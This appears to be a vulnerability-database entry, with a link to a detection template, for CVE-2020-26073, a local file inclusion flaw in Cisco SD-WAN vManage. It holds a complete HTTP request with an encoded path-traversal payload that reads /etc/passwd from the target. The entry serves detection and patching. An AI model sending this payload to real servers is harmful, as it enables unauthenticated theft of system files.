🔙 목록으로 돌아가기

CVE-2020-26073: Cisco SD-WAN vManage Software - Local File Inclusion

TitleCisco SD-WAN vManage Software - Local File Inclusion
Authormadrobot
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the affected system.
RemediationApply the latest security patches provided by Cisco to fix the vulnerability.
EPSS Score0.90637
CVE IDCVE-2020-26073
Tags cve cve2020 cisco lfi vkev vuln

🔍 Vulnerability Description

Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.

🌐 HTTP Request

GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26073.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-26073.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A